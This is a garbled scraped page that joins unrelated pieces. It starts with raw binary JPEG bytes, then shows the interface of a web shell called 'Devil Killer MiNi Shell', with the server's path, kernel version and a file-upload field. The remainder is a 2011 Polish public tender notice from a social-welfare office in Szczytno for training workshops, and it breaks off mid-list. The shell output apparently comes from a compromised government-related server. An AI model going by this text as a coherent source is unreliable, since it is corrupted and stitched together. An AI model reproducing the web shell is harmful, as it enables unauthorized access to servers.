JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/122207-N-2011.html

<p class="kh_header"><b>Szczytno: Usługi polegające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla uczestników projektu pt Aktywność  i Integracja szansą na przyszłość</b><br>
<b>Numer ogłoszenia: 122207 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej  w Szczytnie , ul. Polska 49, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 624 01 84, faks 0-89 624 01 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szczytnogw.1.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi polegające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla uczestników projektu pt Aktywność  i Integracja szansą na przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem Zamówienia są usługi polegające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla beneficjentów ostatecznych (wyłonionych spośród klientów GOPS) w ramach projektu systemowego Aktywność i Integracja szansą na przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego,  Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, w zakresie: w ramach kontraktów socjalnych dla 36 osób z terenu gminy wiejskiej Szczytno:
1) Warsztat zastosowanie komputera i internetu w codziennym życiu z obsługą kasy fiskalnej -36 osoby  (2grupy po 18 osób), czas trwania: 130 h/grupę,  łącznie 260 h, w okresie:( VI-IX),
2)Warsztat grupowe poradnictwo zawodowe - 36 osób;(2 grupy po 18osób) , czas trwania 30h/grupę, tj.  5 dni po 6h, łącznie 60h, w okresie ( V-VI),
3) Indywidualne doradztwo zawodowe dla 36 osób, czas trwania po 3h/1 osobę, realizacja w okresie: ( X-XI),
4) warsztat kształtowania osobowości z elementami wizażu i stylizacji dla 36 osób (2 grupy po 18 osób), czas trwania: 30 h/grupę,tj. 5 dni po 6h, łącznie 60h, realizacja w okresie: (XI-XII)
W ramach Programu Aktywności Lokalnej dla 19 osób z terenu gminy wiejskiej Szczytno
1) terapia psychospołeczna - 19 osób ( 1 grupa), czas trwania: 30 h/grupę, realizacja w okresie (VII-VIII),
2) Warsztat dotyczący zakładania i działalności spółdzielni socjalnych - 19 osób (1grupa), czas trwania : zajęć teoretycznych 2 dni po 5 h/ grupę, łącznie: 10 h połączone z wyjazdem do wybranej spółdzielni socjalnej, celem wizyty studyjnej - trwającej 1 dzień 5 h, łączny czas trwania   z dojazdem i powrotem 8h - realizacja w okresie ( IX-X),
3) indywidualne poradnictwo zawodowe dla  19 osób, czas trwania 3h/1 osobę; realizacja w okresie ( X-XI),
4) warsztat kształtowania osobowości z elementami wizażu i stylizacji - 19 osób (1 grupa), czas trwania 30h/grupę tj. 5 dni, po 6h, realizacja w okresie: (XI-XII).
4.W szkoleniach uczestniczyć mogą wyłącznie beneficjenci projektu, skierowani przez Zamawiającego (zgodnie z przeprowadzoną rekrutacją przez Gminny Ośrodek Pomocy Społecznej w Szczytnie).
5.Zamówienie dotyczy ośmiu bloków tematycznych.  
OPIS POSZCZEGÓLNYCH BLOKÓW TEMATYCZNYCH ZAMÓWIENIA:
znajduje się w siwz na stronie od 3 do 10 (tabela)
6. Ogólne wymagania stawiane przez Zamawiającego dotyczące realizacji wszystkich bloków tematycznych zamówienia do uwzględnienia w ofercie:
1)Zajęcia powinny trwać w ilości godzin dziennie wskazanych przy poszczególnym bloku tematycznym, odbywać się w godzinach rannych 2 razy w tygodniu bądź 1 raz w tygodniu,   mogą odbywać się w odstępach dwutygodniowych . 
2)Podczas realizacji zajęć należy położyć duży nacisk na zdobycie umiejętności praktycznych, a odbiec w niezbędnym stopniu od przekazywania wiedzy w formie klasycznego wykładu (treści programowe powinny zostać dostarczone uczestnikom na początku zajęć, których one dotyczą w formie podręczników bądź przygotowanych skryptów).
3)Zamawiający wymaga aby Wykonawca zagwarantował uczestnikom szkolenia materiały biurowe niezbędne do przeprowadzenia szkolenia oraz harmonogram szkolenia. Wszystkie materiały dydaktyczne muszą być przekazane uczestnikom w dniu rozpoczęcia zajęć.
4)Warsztaty powinny być przeprowadzone w warunkach lokalowych dostosowanych do prowadzenia zajęć dydaktycznych i  pod tym kątem odpowiednio wyposażonych. Sale dydaktyczne i ćwiczeniowe powinny być przestronne, odpowiednio oświetlone, wentylowane, wyposażone w pomoce szkoleniowe, co najmniej w tablicę standardową lub tablicę flipchart z zapasem kartek, sprzęt audiowizualny (np.telewizor, rzutnik, laptop). 
Wykonawca w trakcie trwania zajęć musi zapewnić dostęp do wc zaopatrzony w środki higieny. Ponadto, w trakcie dnia szkoleniowego wykonawca zorganizuje jedną przerwę kawową (np.: kawa, herbata lub woda mineralna - do wyboru) oraz drobny poczęstunek (np.: ciastka), 
5) W trakcie trwania szkolenia należy zapewnić bazę lokalową i techniczną oraz warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
6)Budynek i sale szkoleniowe muszą być oznakowane informacją o nazwie szkolenia, czasie trwania, numerze sali w której odbywają się zajęcia.
7)Przygotowanie i prowadzenie bieżącej dokumentacji przebiegu warsztatów (m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia  odbioru materiałów szkoleniowych, zwrotu kosztów przejazdu, kserokopii dziennika zajęć, a po zakończeniu zajęć przekazania oryginałów tych dokumentów Zamawiającemu wraz z zaświadczeniami lub certyfikatami potwierdzającymi ukończenie zajęć (z odpowiednim oznakowaniem promocyjnym),
8)Niezwłoczne poinformowanie Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników warsztatów lub rezygnacji z uczestnictwa w trakcie ich trwania,  a także innych okolicznościach mających wpływ na realizację programu nauczania. Zgłoszenia o nieobecności powinny być dokonywane telefonicznie lub mailowo do  Koordynatora projektu.
9)Szkolenie powinno być przeprowadzone przez wykwalifikowaną kadrę wykładowców i instruktorów posiadających wykształcenie  i kwalifikacje oraz doświadczenie zawodowe zgodne z kierunkiem warsztatów lub prowadzonych  zagadnień - zgodnie z opisem warunków udziału w postępowaniu dotyczących osób zdolnych do wykonania zamówienia (pkt 7.1.4 specyfikacji), a także jeżeli są wymagane - udokumentowane uprawnienia do prowadzania danego szkolenia.
10)Podana liczba godzin trwania szkolenia ma przypadać na każdego uczestnika szkolenia i ma odnosić się do pełnych godzin zegarowych. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. Nie ma natomiast możliwości rezygnacji z przerw kosztem skrócenia trwania zajęć, np. jeżeli zajęcia w danym dniu zostały zaplanowane na 5 godzin, poczynając od godziny 8:00, to zajęcia te muszą odbywać się do godziny 13:00. Oferty zawierające inną niż wymagana liczba godzin trwania szkolenia zostaną odrzucone jako niezgodne z treścią specyfikacji istot.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
      Ocena spełnienia  warunku nastąpi na podstawie złożonego oświadczenia z art. 22   
      ust. 1 ustawy Prawo zamówień publicznych.
   Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych co najmniej 2 usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia, tj. zajęcia/warsztaty grupowe na rzecz klientów pomocy społecznej, osób z kręgu wykluczenia  społecznego, z podaniem  ich wartości, przedmiotu, dat wykonania i odbiorców - zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ.               

Ocena spełnienia warunków nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia warunków spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże  że na czas realizacji zamówienia będzie dysponował potencjałem technicznym ( lokal, wyposazenie, sprzęt, urządzenia, stanowiska komputerowe) adekwatnym do danego bloku tematycznego zamówienia, 
- warsztat zastosowanie komputera i internetu w codziennym życiu z obsługą kasy fiskalnej -
sale dydaktyczne/ szkoleniowe  przestrzenne, odpowiednio oświetlone, zapewniające samodzielne stanowisko komputerowe dla co najmniej 1 osób ( 1 grupa); zapewnienie co najmniej 1 kasy fiskalnej na 2 uczestników zajęć, zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny;
- warsztat grupowe poradnictwo zawodowe - sale dydaktyczne/ szkoleniowe  przestrzenne, odpowiednio oświetlone, zapewniające stanowisko dla co najmniej 20 osób: stolik, krzesło ; wyposażone w  minimum pomoce dydaktyczne m.in.: tablicę standardową (sucho-ścierną),korkową lub flipchart  z zapasem kartek; w sprzęt audiowizualny (np. laptop, rzutnik, telewizor), zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny; - indywidualne doradztwo zawodowe sala dydaktyczna przestrzenna, odpowiednio oświetlona, wyposażona   w meble (np. stolik krzesło), zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny; - warsztat kształtowania osobowości z elementami wizażu i stylizacji sale dydaktyczne/ szkoleniowe  przestrzenne,odpowiednio oświetlone, zapewniające stanowisko dla co najmniej 20 osób: stolik, krzesło ; wyposażone w  minimum pomoce dydaktyczne m.in.: tablicę standardową (sucho-ścierną), korkową lub flipchart z zapasem kartek; w sprzęt audiowizualny (np.laptop, rzutnik, telewizor,),zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny; - terapia psychospołeczna - sale dydaktyczne/ szkoleniowe  przestrzenne,odpowiednio oświetlone, zapewniające stanowisko dla co najmniej 20 osób: stolik, krzesło ; wyposażone w  minimum pomoce dydaktyczne m.in.: tablicę standardową (sucho-ścierną), korkową lub  flipchart  z zapasem kartek; w sprzęt audiowizualny (np.laptop, rzutnik, telewizor), zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny; - warsztat dotyczący zakładania i działalności spółdzielni socjalnych sale dydaktyczne/ szkoleniowe  przestrzenne, odpowiednio oświetlone, zapewniające stanowisko dla co najmniej 20 osób: stolik, krzesło ; wyposażone w  minimum pomoce dydaktyczne m.in.: tablicę standardową (sucho-ścierną), korkową lub  flipchart  z zapasem kartek; w sprzęt audiowizualny (np.laptop, rzutnik, telewizor), zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny; - indywidualne poradnictwo zawodowe sala dydaktyczna przestrzenna, odpowiednio oświetlona, wyposażona  w meble (np. stolik krzesło) , zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny;
- warsztat kształtowania osobowości z elementami wizażu i stylizacji:  sale dydaktyczne/ szkoleniowe  przestrzenne, odpowiednio oświetlone, zapewniające stanowisko dla co najmniej 20 osób: stolik, krzesło ; wyposażone w  minimum pomoce dydaktyczne m.in.: tablicę standardową (sucho-ścierną), korkową lub  flipchart  z zapasem kartek; w sprzęt audiowizualny (np.laptop, rzutnik, telewizor,) zaplecze socjalne w tym dostęp do wc zaopatrzonego w środki higieny;
Ocena spełnienia tego warunku nastąpi na podstawie złożonego: oświadczenia z art. 22   ust.  1  ustawy Prawo zamówień publicznych oraz wykazu dotyczącego ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne dla potrzeb zajęć - zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ;
   Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia niniejszy warunek zamawiący wymaga aby wykonawca dysponował osobami zdolnymi do wykonania zamówienia zgodnie z opisem dla poszczególnych bloków tematycznych - warsztat zastosowanie komputera i internetu w codziennym życiu z obsługą kasy fiskalnej - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonego przedmiotu, z przygotowaniem pedagogicznym;
oraz doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 szkoleń dla osób dorosłych, wykładowcy/instruktorzy prowadzący zajęcia z obsługi kasy fiskalnej , powinni posiadać  wykształcenie minimum średnie z przygotowaniem pedagogicznym posiadający  doświadczenie w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 szkoleń dla osób dorosłych, - warsztat grupowe poradnictwo zawodowe - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych  z doradztwa zawodowego , z przygotowaniem pedagogicznym;
oraz  doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego); - indywidualne doradztwo zawodowe - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych  z doradztwa zawodowego , z przygotowaniem pedagogicznym; doświadczenia w prowadzeniu indywidualnych  konsultacji , polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego); - warsztat kształtowania osobowości z elementami wizażu i stylizacji - posiadanie przez  wykładowcę w przypadku zajęć  kształtowania osobowości  wykształcenia wyższego  z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonych zajęć, z przygotowaniem pedagogicznym; posiadanie doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej  3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego);  z zakresu elementów wizażu i stylizacji wykładowcy/instruktorzy ,  powinni posiadać  wykształcenie minimum średnie z przygotowaniem pedagogicznym,posiadający  doświadczenie w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 , warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego) ; - terapia psychospołeczna - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z  programem warsztatów kierunkiem prowadzonych zajęć , z przygotowaniem pedagogicznym oraz posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego); - warsztat dotyczący zakładania i działalności spółdzielni socjalnych - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych   z przygotowaniem pedagogicznym oraz posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego); - indywidualne poradnictwo zawodowe - posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych  z doradztwa zawodowego , z przygotowaniem pedagogicznym; doświadczenia w prowadzeniu indywidualnych  konsultacji , polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego); - warsztat kształtowania osobowości z elementami wizażu i stylizacji - posiadanie przez  wykładowcę w przypadku zajęć  kształtowania osobowości  wykształcenia wyższego  z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonych zajęć, z przygotowaniem pedagogicznym; posiadanie doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej  3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego);  z zakresu elementów wizażu i stylizacji wykładowcy/instruktorzy ,  powinni posiadać  wykształcenie minimum średnie z przygotowaniem pedagogicznym,posiadający  doświadczenie w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 , warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego);
Ocena spełnienia  warunku nastąpi na podstawie: złożonego oświadczenia z art. 22   ust.  1  ustawy Prawo zamówień publicznych oraz załącznika nr 5 do SIWZ - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia ,wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
   Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia  warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

